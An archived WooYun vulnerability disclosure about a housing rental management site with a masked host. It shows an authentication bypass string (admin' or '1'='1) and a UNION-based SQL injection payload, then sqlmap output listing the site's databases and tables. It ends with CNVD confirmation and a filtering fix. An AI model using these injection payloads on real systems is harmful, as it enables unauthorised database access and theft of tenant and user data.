乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-06: 细节已通知厂商并且等待厂商处理中 2015-11-10: 厂商已经确认,细节仅向厂商公开 2015-11-20: 细节向核心白帽子及相关领域专家公开 2015-11-30: 细节向普通白帽子公开 2015-12-10: 细节向实习白帽子公开 2015-12-25: 细节向公众公开
**.**.**.**:8081/login.aspx
账号:admin' or '1'='1密码任意
注入点
**.**.**.**:8081/tenant.aspx?houseid=2035&id=3637&action=edit
Payload: houseid=2035&id=-5718' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(88)+CHAR(106)+CHAR(113)+CHAR(105)+CHAR(105)+CHAR(106)+CHAR(78)+CHAR(107)+CHAR(88)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(106)+CHAR(113),NULL-- &action=edit---[13:59:08] [INFO] testing Microsoft SQL Server[13:59:08] [INFO] confirming Microsoft SQL Server[13:59:09] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008[13:59:09] [INFO] fetching database names[13:59:09] [INFO] the SQL query used returns 8 entries[13:59:09] [INFO] retrieved: ljhouse[13:59:10] [INFO] retrieved: master[13:59:10] [INFO] retrieved: model[13:59:10] [INFO] retrieved: msdb[13:59:10] [INFO] retrieved: ReportServer[13:59:10] [INFO] retrieved: ReportServerTempDB[13:59:11] [INFO] retrieved: tempdb[13:59:11] [INFO] retrieved: zpbigdataavailable databases [8]:[*] ljhouse[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] zpbigdata
Payload: houseid=2035&id=-5718' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(88)+CHAR(106)+CHAR(113)+CHAR(105)+CHAR(105)+CHAR(106)+CHAR(78)+CHAR(107)+CHAR(88)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(106)+CHAR(113),NULL-- &action=edit---[14:00:00] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008[14:00:00] [INFO] fetching tables for database: ljhouse[14:00:01] [INFO] the SQL query used returns 17 entries[14:00:01] [INFO] retrieved: dbo.city[14:00:01] [INFO] retrieved: dbo.house[14:00:01] [INFO] retrieved: dbo.ht[14:00:01] [INFO] retrieved: dbo.landlord[14:00:02] [INFO] retrieved: dbo.needhouse[14:00:02] [INFO] retrieved: dbo.provincial[14:00:02] [INFO] retrieved: dbo.sys_area[14:00:05] [INFO] retrieved: dbo.sys_depart[14:00:05] [INFO] retrieved: dbo.sys_dict[14:00:06] [INFO] retrieved: dbo.sys_login_lj[14:00:06] [INFO] retrieved: dbo.sys_serverStation[14:00:06] [INFO] retrieved: dbo.sys_user[14:00:06] [INFO] retrieved: dbo.sys_visitEven[14:00:06] [INFO] retrieved: dbo.sysdiagrams[14:00:07] [INFO] retrieved: dbo.tenant[14:00:07] [INFO] retrieved: dbo.visitqk[14:00:08] [INFO] retrieved: dbo.visitqkDatabase: ljhouse[17 tables]+-------------------+| city || house || ht || landlord || needhouse || provincial || sys_area || sys_depart || sys_dict || sys_login_lj || sys_serverStation || sys_user || sys_visitEven || sysdiagrams || tenant || visitqk || visitqk |+-------------------+
过滤sql特殊字符
危害等级:高
漏洞Rank:10
确认时间:2015-11-10 10:36
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发江苏分中心,由其后续协调网站管理单位处置。
暂无